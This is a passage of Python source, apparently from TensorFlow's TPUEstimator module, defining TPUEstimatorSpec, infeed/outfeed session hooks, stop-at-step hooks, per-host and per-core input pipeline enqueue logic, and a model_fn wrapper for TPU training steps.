array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(
collections.namedtuple('TPUEstimatorSpec', [
'mode',
'predictions',
'loss',
'train_op',
'eval_metrics',
'export_outputs',
'scaffold_fn',
'host_call'
])):
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, 'predictions, 'loss', 'train_op', and
'export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=hooks,
evaluation_hooks=hooks,
prediction_hooks=hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.' % self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._session_cancel_timer = None
self._feed_error = None
self._finished = False
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _log_error(self, session, error):
"""Log an infeed or outfeed error.
This logs a short error message immediately, and schedules a timer to
emit the full stack trace and error message after a short period of time.
If the main session has terminated by the time the timer triggers, we
assume the real source of the error was from the main session and avoid
emitting a stack trace for the infeed.
Args:
session: `tf.Session`, session to be terminated error: exception that
triggered logging.
error: the Exception to log.
"""
logging.warning(
'\n\n'
'Error occurred during infeed/outfeed. This may be due to a compile '
'error in the main session. Waiting for a short time for the main '
'session to come back.\n\n%s', error)
self._feed_error = traceback.format_exc()
# If we've already encountered a feed error, don't schedule another
# cancellation op.
if self._session_cancel_timer:
return
def _cancel_session():
# Close the session to avoid the main thread from hanging. If input
# pipeline triggers any error, the infeed thread dies but the main thread
# for TPU computation waits for the infeed enqueue forever. Close the
# Session to cancel the main thread Session.run execution.
#
# We sleep for a few seconds before closing to give some time
# for the TPU compilation error, if any, propagating, from TPU to CPU
# host. Compilation errors should be reported by the main thread so that
# the program can be interrupted and users can take action. Due to a race
# condition, the infeed thread might see an error first. Closing the
# session here immediately would result in a session cancellation
# exception in the main thread, instead of the expected compile error.
# User code that depends on having the proper exception type will
# therefore be confused.
time.sleep(5)
# If the main session is still running, the infeed/outfeed errors are
# legitimate, and should be logged.
if not self._finished and self._feed_error:
logging.error('Feed error: %s', self._feed_error)
logging.error('Closing session. A RuntimeError should follow.')
session.close()
self._session_cancel_timer = threading.Thread(target=_cancel_session)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('%s thread sleeping for %d seconds.', self._name,
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('%s thread starting after sleep', self._name)
try:
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
try:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
logging.info('Start infeed thread controller')
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
logging.info('Start outfeed thread controller')
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
def before_run(self, run_context):
self._feed_error = None
# Wait for the cancellation timer to complete before continuing.
if self._session_cancel_timer:
self._session_cancel_timer.join()
self._session_cancel_timer = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
if self._session_cancel_timer:
logging.warning('Feed error occurred; waiting for message.')
self._session_cancel_timer.join()
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
logging.info('Stop output thread controller')
self._outfeed_controller.join()
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
inputs = _Inputs.from_input_fn(input_fn())
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment yet. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
# TODO(ylc): Refactoring the code to merge the tpu ordinal logic here and the
# _TPUContext.tpu_ordinal_function. We should either introduce another
# abstraction or a different helper method.
def _tpu_ordinal_function_impl(shard_index_in_host):
# We put both enqueue/dequeue op at tpu.core(0) in each replica.
replica = ctx.device_assignment.lookup_replicas(
host_id, (0, 0, 0))[shard_index_in_host]
return ctx.device_assignment.tpu_ordinal(replica=replica)
if ctx.model_parallelism_enabled:
tpu_ordinal_function = _tpu_ordinal_function_impl
else:
tpu_ordinal_function = None
def enqueue_ops_fn():
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels, signals)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
del host_id # unused
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
# TODO(b/XXX): Add predict support for PER_HOST_V2
raise TypeError('Most PREDICT not yet supported in PER_HOST_V2 mode.')
hooks.append(inputs.dataset_initializer_hook())
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in `_TPUContext`, it
invokes `input_fn` for all cores (usually multi-host TPU training) or for one
host (usually for single-host TPU evaluation), and sends all `features` and
`labels` returned by `input_fn` to TPU infeed. For per-core invocation,
`features` and `labels` are piped to infeed directly, one tuple for each
core. For per-host invocation, `features` and `labels` are split at host
(with respect to `batch_axis`) and piped to all cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
TPU infeed/outfeed library expects flattened tensor list. So, `features` and
`labels` need to be flattened, before infeed enqueue, and the structure of
them needs to be recorded, in order to restore them after infeed dequeue.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self):
# Holds the structure of inputs
self._feature_names = []
self._label_names = []
self._has_labels = False
self._signals_helper = None
# Internal state.
self._initialized = False
def has_labels(self):
return self._has_labels
def validate_and_record_structure(self, features, labels, signals=None):
"""Validates and records the structure of features` and `labels`."""
def _extract_key_names(tensor_or_dict):
if tensor_or_dict is None:
return []
return sorted(tensor_or_dict.keys()) if isinstance(
tensor_or_dict, dict) else []
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if signals is not None and self._signals_helper is None:
# Record signals helper.
self._signals_helper = _SignalsHelper(signals)
if self._initialized:
# Verify the structure is same. The following should never happen.
assert feature_names == self._feature_names, 'feature keys mismatched'
assert label_names == self._label_names, 'label keys mismatched'
assert has_labels == self._has_labels, 'label presence mismatched'
else:
# Record structure.
self._initialized = True
self._feature_names = feature_names
self._label_names = label_names
self._has_labels = has_labels
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
flattened_inputs = []
if self._feature_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend(
[features[name] for name in self._feature_names])
else:
flattened_inputs.append(features)
if labels is not None:
if self._label_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend([labels[name] for name in self._label_names])
else:
flattened_inputs.append(labels)
if signals is not None:
flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
return flattened_inputs
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
expected_num_features = (
len(self._feature_names) if self._feature_names else 1)
if self._has_labels:
expected_num_labels = (
len(self._label_names) if self._label_names else 1)
else:
expected_num_labels = 0
expected_num_signals = (
self._signals_helper.num_signals if self._signals_helper else 0)
expected_num_tensors = (
expected_num_features + expected_num_labels + expected_num_signals)
if expected_num_tensors != len(flattened_inputs):
raise ValueError(
'The number of flattened tensors mismatches expected num. '
'Expected {}, got {}'.format(expected_num_tensors,
len(flattened_inputs)))
if self._feature_names:
unflattened_features = dict(
zip(self._feature_names, flattened_inputs[:expected_num_features]))
else:
# Single tensor case
unflattened_features = flattened_inputs[0]
if expected_num_labels == 0:
unflattened_label = None
elif self._label_names:
label_list = flattened_inputs[
expected_num_features:expected_num_features + expected_num_labels]
unflattened_label = dict(zip(self._label_names, label_list))
else:
# Single tensor case.
unflattened_label = flattened_inputs[expected_num_features]
signals = None
if expected_num_signals != 0:
tensor_list_for_signals = flattened_inputs[
expected_num_features + expected_num_labels:]
signals = self._signals_helper.unflatten(tensor_list_for_signals)
return _Inputs(unflattened_features, unflattened_label, signals=signals)
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_TPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
# Perform some sanity checks to log user friendly information. We should
# error out to give users better error message. But, if
# _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
# user code, so, log a warning.
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/programmers_guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, TPUEstimatorSpec):
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, TPUEstimatorSpec) and
estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
